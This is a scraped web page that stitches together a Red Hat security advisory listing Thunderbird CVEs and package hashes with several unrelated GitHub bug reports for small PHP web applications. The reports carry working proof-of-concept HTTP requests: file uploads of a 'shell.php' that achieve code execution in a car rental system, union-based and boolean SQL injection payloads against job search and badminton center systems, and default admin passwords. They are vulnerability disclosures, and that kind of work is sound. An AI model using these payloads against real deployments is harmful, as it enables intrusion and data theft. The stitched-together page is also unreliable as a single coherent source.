An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-1834: Mozilla: Braille space character caused incorrect sender email to be shown for a digitally signed email
* CVE-2022-31736: Mozilla: Cross-Origin resource's length leaked
* CVE-2022-31737: Mozilla: Heap buffer overflow in WebGL
* CVE-2022-31738: Mozilla: Browser window spoof using fullscreen mode
* CVE-2022-31740: Mozilla: Register allocation problem in WASM on arm64
* CVE-2022-31741: Mozilla: Uninitialized variable leads to invalid memory read
* CVE-2022-31742: Mozilla: Querying a WebAuthn token with a large number of allowCredential entries may have leaked cross-origin information
* CVE-2022-31747: Mozilla: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

发布：

2022-06-02

已更新：

2022-06-02

**RHSA-2022:4889 - Security Advisory**

*   概述
*   更新的软件包

**概述**

Important: thunderbird security update

**类型/严重性**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**标题**

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Extended Update Support.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**描述**

Mozilla Thunderbird is a standalone mail and newsgroup client.  

This update upgrades Thunderbird to version 91.10.0.  

Security Fix(es):  

*   Mozilla: Braille space character caused incorrect sender email to be shown for a digitally signed email (CVE-2022-1834)
*   Mozilla: Cross-Origin resource's length leaked (CVE-2022-31736)
*   Mozilla: Heap buffer overflow in WebGL (CVE-2022-31737)
*   Mozilla: Browser window spoof using fullscreen mode (CVE-2022-31738)
*   Mozilla: Register allocation problem in WASM on arm64 (CVE-2022-31740)
*   Mozilla: Uninitialized variable leads to invalid memory read (CVE-2022-31741)
*   Mozilla: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10 (CVE-2022-31747)
*   Mozilla: Querying a WebAuthn token with a large number of allowCredential entries may have leaked cross-origin information (CVE-2022-31742)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**解决方案**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to take effect.

**受影响的产品**

*   Red Hat Enterprise Linux for x86\_64 - Extended Update Support 8.4 x86\_64
*   Red Hat Enterprise Linux Server - AUS 8.4 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 8.4 s390x
*   Red Hat Enterprise Linux for Power, little endian - Extended Update Support 8.4 ppc64le
*   Red Hat Enterprise Linux Server - TUS 8.4 x86\_64
*   Red Hat Enterprise Linux for ARM 64 - Extended Update Support 8.4 aarch64
*   Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.4 ppc64le
*   Red Hat Enterprise Linux Server for x86\_64 - Update Services for SAP Solutions 8.4 x86\_64

**修复**

*   BZ - 2092018 - CVE-2022-31736 Mozilla: Cross-Origin resource's length leaked
*   BZ - 2092019 - CVE-2022-31737 Mozilla: Heap buffer overflow in WebGL
*   BZ - 2092021 - CVE-2022-31738 Mozilla: Browser window spoof using fullscreen mode
*   BZ - 2092023 - CVE-2022-31740 Mozilla: Register allocation problem in WASM on arm64
*   BZ - 2092024 - CVE-2022-31741 Mozilla: Uninitialized variable leads to invalid memory read
*   BZ - 2092025 - CVE-2022-31742 Mozilla: Querying a WebAuthn token with a large number of allowCredential entries may have leaked cross-origin information
*   BZ - 2092026 - CVE-2022-31747 Mozilla: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10
*   BZ - 2092416 - CVE-2022-1834 Mozilla: Braille space character caused incorrect sender email to be shown for a digitally signed email

**CVE**

*   CVE-2022-1834
*   CVE-2022-31736
*   CVE-2022-31737
*   CVE-2022-31738
*   CVE-2022-31740
*   CVE-2022-31741
*   CVE-2022-31742
*   CVE-2022-31747

**参考**

*   https://access.redhat.com/security/updates/classification/#important

**Red Hat Enterprise Linux for x86\_64 - Extended Update Support 8.4**

SRPM

thunderbird-91.10.0-1.el8\_4.src.rpm

SHA-256: bfccfcfe37254d448e60fb36b02bb13b5e95ccb670ae6226cd80a613cc10c2d9

x86\_64

thunderbird-91.10.0-1.el8\_4.x86\_64.rpm

SHA-256: 95d52d4c7e436bc1f4aebc286c778f164192cbb7577dacb00f160106e3cbe3b5

thunderbird-debuginfo-91.10.0-1.el8\_4.x86\_64.rpm

SHA-256: 2af4ab7c0423c0c0ebc13ec3131b0f0bd837f2b719611d7aa4c21f6da0d57c77

thunderbird-debugsource-91.10.0-1.el8\_4.x86\_64.rpm

SHA-256: 10c27405391d9e1d3115d3d41ce917b05b3d8c9047a8485569e7893984467931

**Red Hat Enterprise Linux Server - AUS 8.4**

SRPM

thunderbird-91.10.0-1.el8\_4.src.rpm

SHA-256: bfccfcfe37254d448e60fb36b02bb13b5e95ccb670ae6226cd80a613cc10c2d9

x86\_64

thunderbird-91.10.0-1.el8\_4.x86\_64.rpm

SHA-256: 95d52d4c7e436bc1f4aebc286c778f164192cbb7577dacb00f160106e3cbe3b5

thunderbird-debuginfo-91.10.0-1.el8\_4.x86\_64.rpm

SHA-256: 2af4ab7c0423c0c0ebc13ec3131b0f0bd837f2b719611d7aa4c21f6da0d57c77

thunderbird-debugsource-91.10.0-1.el8\_4.x86\_64.rpm

SHA-256: 10c27405391d9e1d3115d3d41ce917b05b3d8c9047a8485569e7893984467931

**Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 8.4**

SRPM

thunderbird-91.10.0-1.el8\_4.src.rpm

SHA-256: bfccfcfe37254d448e60fb36b02bb13b5e95ccb670ae6226cd80a613cc10c2d9

s390x

thunderbird-91.10.0-1.el8\_4.s390x.rpm

SHA-256: 70e5d0fe38dec0205316b6aae64b7fd3396a03ce6b58afc2341dde78786c73f0

thunderbird-debuginfo-91.10.0-1.el8\_4.s390x.rpm

SHA-256: e5bf6e10e49491d9e7a51d801b7d5acd0fe51eb9aaa9bd6b5889ec124535d562

thunderbird-debugsource-91.10.0-1.el8\_4.s390x.rpm

SHA-256: 31fbfa7c16b3c0a533bde61a3a92e61a9180b528fd3683a826e1e0d3a1399f65

**Red Hat Enterprise Linux for Power, little endian - Extended Update Support 8.4**

SRPM

thunderbird-91.10.0-1.el8\_4.src.rpm

SHA-256: bfccfcfe37254d448e60fb36b02bb13b5e95ccb670ae6226cd80a613cc10c2d9

ppc64le

thunderbird-91.10.0-1.el8\_4.ppc64le.rpm

SHA-256: 77fce9860fbc82952c8b563285abb52916a738ef64071fd72887e5162808bccc

thunderbird-debuginfo-91.10.0-1.el8\_4.ppc64le.rpm

SHA-256: 2381d9008344c87c00e0518ee6dd1609211543865debcede93f3e403af8ea16b

thunderbird-debugsource-91.10.0-1.el8\_4.ppc64le.rpm

SHA-256: b8a3643605fe3718ed971f945fa0e753f51485709ea4e2345aee52a945132bf4

**Red Hat Enterprise Linux Server - TUS 8.4**

SRPM

thunderbird-91.10.0-1.el8\_4.src.rpm

SHA-256: bfccfcfe37254d448e60fb36b02bb13b5e95ccb670ae6226cd80a613cc10c2d9

x86\_64

thunderbird-91.10.0-1.el8\_4.x86\_64.rpm

SHA-256: 95d52d4c7e436bc1f4aebc286c778f164192cbb7577dacb00f160106e3cbe3b5

thunderbird-debuginfo-91.10.0-1.el8\_4.x86\_64.rpm

SHA-256: 2af4ab7c0423c0c0ebc13ec3131b0f0bd837f2b719611d7aa4c21f6da0d57c77

thunderbird-debugsource-91.10.0-1.el8\_4.x86\_64.rpm

SHA-256: 10c27405391d9e1d3115d3d41ce917b05b3d8c9047a8485569e7893984467931

**Red Hat Enterprise Linux for ARM 64 - Extended Update Support 8.4**

SRPM

thunderbird-91.10.0-1.el8\_4.src.rpm

SHA-256: bfccfcfe37254d448e60fb36b02bb13b5e95ccb670ae6226cd80a613cc10c2d9

aarch64

thunderbird-91.10.0-1.el8\_4.aarch64.rpm

SHA-256: fed0634594a6f33306cc8320620b96091ca7a2569db71acf1fbc6b0876088dfb

thunderbird-debuginfo-91.10.0-1.el8\_4.aarch64.rpm

SHA-256: 58036b5e5caaf9e895e5ddaae43b8a97e43b2b92464bcbbd9ce6a6af4cf7a2d0

thunderbird-debugsource-91.10.0-1.el8\_4.aarch64.rpm

SHA-256: 4cf930e6dab32710f5e6b29975916e6183dfcfc5571a67fb00d91bc041d5f19c

**Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.4**

SRPM

thunderbird-91.10.0-1.el8\_4.src.rpm

SHA-256: bfccfcfe37254d448e60fb36b02bb13b5e95ccb670ae6226cd80a613cc10c2d9

ppc64le

thunderbird-91.10.0-1.el8\_4.ppc64le.rpm

SHA-256: 77fce9860fbc82952c8b563285abb52916a738ef64071fd72887e5162808bccc

thunderbird-debuginfo-91.10.0-1.el8\_4.ppc64le.rpm

SHA-256: 2381d9008344c87c00e0518ee6dd1609211543865debcede93f3e403af8ea16b

thunderbird-debugsource-91.10.0-1.el8\_4.ppc64le.rpm

SHA-256: b8a3643605fe3718ed971f945fa0e753f51485709ea4e2345aee52a945132bf4

**Red Hat Enterprise Linux Server for x86\_64 - Update Services for SAP Solutions 8.4**

SRPM

thunderbird-91.10.0-1.el8\_4.src.rpm

SHA-256: bfccfcfe37254d448e60fb36b02bb13b5e95ccb670ae6226cd80a613cc10c2d9

x86\_64

thunderbird-91.10.0-1.el8\_4.x86\_64.rpm

SHA-256: 95d52d4c7e436bc1f4aebc286c778f164192cbb7577dacb00f160106e3cbe3b5

thunderbird-debuginfo-91.10.0-1.el8\_4.x86\_64.rpm

SHA-256: 2af4ab7c0423c0c0ebc13ec3131b0f0bd837f2b719611d7aa4c21f6da0d57c77

thunderbird-debugsource-91.10.0-1.el8\_4.x86\_64.rpm

SHA-256: 10c27405391d9e1d3115d3d41ce917b05b3d8c9047a8485569e7893984467931

Red Hat 安全团队联络方式为 secalert@redhat.com。 更多联络细节请参考 https://access.redhat.com/security/team/contact/。

RHSA-2022:4889: Red Hat Security Advisory: thunderbird security update

Car Rental Management System v1.0 is vulnerable to Arbitrary code execution via car-rental-management-system/admin/ajax.php?action=save_car.

Permalink

Cannot retrieve contributors at this time

**Car Rental Management System v1.0 has arbitrary code execution (RCE)**

vendor: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability url: ip/car-rental-management-system/admin/ajax.php?action=save\_car

Request package for file upload：

POST /car\-rental\-management\-system/admin/ajax.php?action\=save\_car HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/car-rental-management-system/admin/index.php?page=manage\_car&id=6
Content-Length: 1107
Content-Type: multipart/form-data; boundary=---------------------------16501296121152
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close
\-----------------------------16501296121152
Content-Disposition: form-data; name="id"
6
\-----------------------------16501296121152
Content-Disposition: form-data; name="brand"
1
\-----------------------------16501296121152
Content-Disposition: form-data; name="model"
1
\-----------------------------16501296121152
Content-Disposition: form-data; name="category\_id"
6
\-----------------------------16501296121152
Content-Disposition: form-data; name="engine\_id"
3
\-----------------------------16501296121152
Content-Disposition: form-data; name="transmission\_id"
3
\-----------------------------16501296121152
Content-Disposition: form-data; name="description"
111
\-----------------------------16501296121152
Content-Disposition: form-data; name="price"
10
\-----------------------------16501296121152
Content-Disposition: form-data; name="qty"
110
\-----------------------------16501296121152
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/pdf
JFJF
<?php phpinfo();?>
\-----------------------------16501296121152--

The files will be uploaded to this directory \\admin\\assets\\uploads\\cars\_img 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-32019: bug_report/RCE-1.md at main · k0xx11/bug_report

Badminton Center Management System v1.0 is vulnerable to SQL Injection via /bcms/admin/?page=sales/view_details&id.

**Badminton Center Management System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15318/badminton-center-management-system-phpoop-free-source-code.html

Current database name: bcms\_db,length is 7

Vulnerability File: /bcms/admin/?page=sales/view\_details&id=

Vulnerability location: /bcms/admin/?page=sales/view\_details&id=, id

\[+\] Payload: /bcms/admin/?page=sales/view\_details&id=6%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /bcms/admin/?page\=sales/view\_details&id\=6%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

When length (database ()) = 6, Content-Length: 28921 

When length (database ()) = 7, Content-Length: 29893

CVE-2022-31994: bug_report/SQLi-9.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/company/index.php?view=edit&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/company/index.php?view=edit&id=

Vulnerability location: /eris/admin/company/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/company/index.php?view=edit&id=-3%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /eris/admin/company/index.php?view\=edit&id\=\-3%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32007: bug_report/SQLi-2.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via eris/admin/vacancy/index.php?view=edit&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/vacancy/index.php?view=edit&id=

Vulnerability location: /eris/admin/vacancy/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/vacancy/index.php?view=edit&id=-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /eris/admin/vacancy/index.php?view\=edit&id\=\-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32008: bug_report/SQLi-3.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/applicants/index.php?view=view&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/applicants/index.php?view=view&id=

Vulnerability location: /eris/admin/applicants/index.php?view=view&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/applicants/index.php?view=view&id=-2%27%20union%20select%201,2,3,4,5,6,database(),8,9,10,11--+ // Leak place ---> id

GET /eris/admin/applicants/index.php?view\=view&id\=\-2%27%20union%20select%201,2,3,4,5,6,database(),8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32011: bug_report/SQLi-5.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/user/index.php?view=edit&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/user/index.php?view=edit&id=

Vulnerability location: /eris/admin/user/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/user/index.php?view=edit&id=-00018%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /eris/admin/user/index.php?view\=edit&id\=\-00018%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32010: bug_report/SQLi-7.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via eris/admin/category/index.php?view=edit&id=.

Permalink

Cannot retrieve contributors at this time

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/category/index.php?view=edit&id=

Vulnerability location: /eris/admin/category/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/category/index.php?view=edit&id=-24%27%20union%20select%201,database()--+ // Leak place ---> id

GET /eris/admin/category/index.php?view\=edit&id\=\-24%27%20union%20select%201,database()\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32013: bug_report/SQLi-6.md at main · k0xx11/bug_report

Car Rental Management System v1.0 is vulnerable to SQL Injection via /car-rental-management-system/admin/manage_movement.php?id=.

**Car Rental Management System v1.0 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability File: /car-rental-management-system/admin/manage\_movement.php?id=

Vulnerability location: /car-rental-management-system/admin/manage\_movement.php?id=,id

\[+\] Payload: /car-rental-management-system/admin/manage\_movement.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,database(),16,17--+ // Leak place ---> id

Current database name: car\_rental\_db

GET /car\-rental\-management\-system/admin/manage\_movement.php?id\=\-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,database(),16,17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close

CVE-2022-32021: bug_report/SQLi-3.md at main · k0xx11/bug_report

Car Rental Management System v1.0 is vulnerable to Arbitrary code execution via ip/car-rental-management-system/admin/ajax.php?action=save_settings.

Permalink

Cannot retrieve contributors at this time

**Car Rental Management System v1.0 has arbitrary code execution (RCE)**

vendor: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability url: ip/car-rental-management-system/admin/ajax.php?action=save\_settings

Request package for file upload：

POST /car\-rental\-management\-system/admin/ajax.php?action\=save\_settings HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/car-rental-management-system/admin/index.php?page=site\_settings
Content-Length: 1636
Content-Type: multipart/form-data; boundary=---------------------------218441699924310
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close
\-----------------------------218441699924310
Content-Disposition: form-data; name="name"
Car Rental Management System
\-----------------------------218441699924310
Content-Disposition: form-data; name="email"
info@sample.comm
\-----------------------------218441699924310
Content-Disposition: form-data; name="contact"
+6948 8542 623
\-----------------------------218441699924310
Content-Disposition: form-data; name="about"
&nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industryâ��s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum. 
\-----------------------------218441699924310
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------218441699924310--

The files will be uploaded to this directory \\admin\\assets\\uploads 

We visited the directory of the file in the browser and found that the code had been executed

Tag

#firefox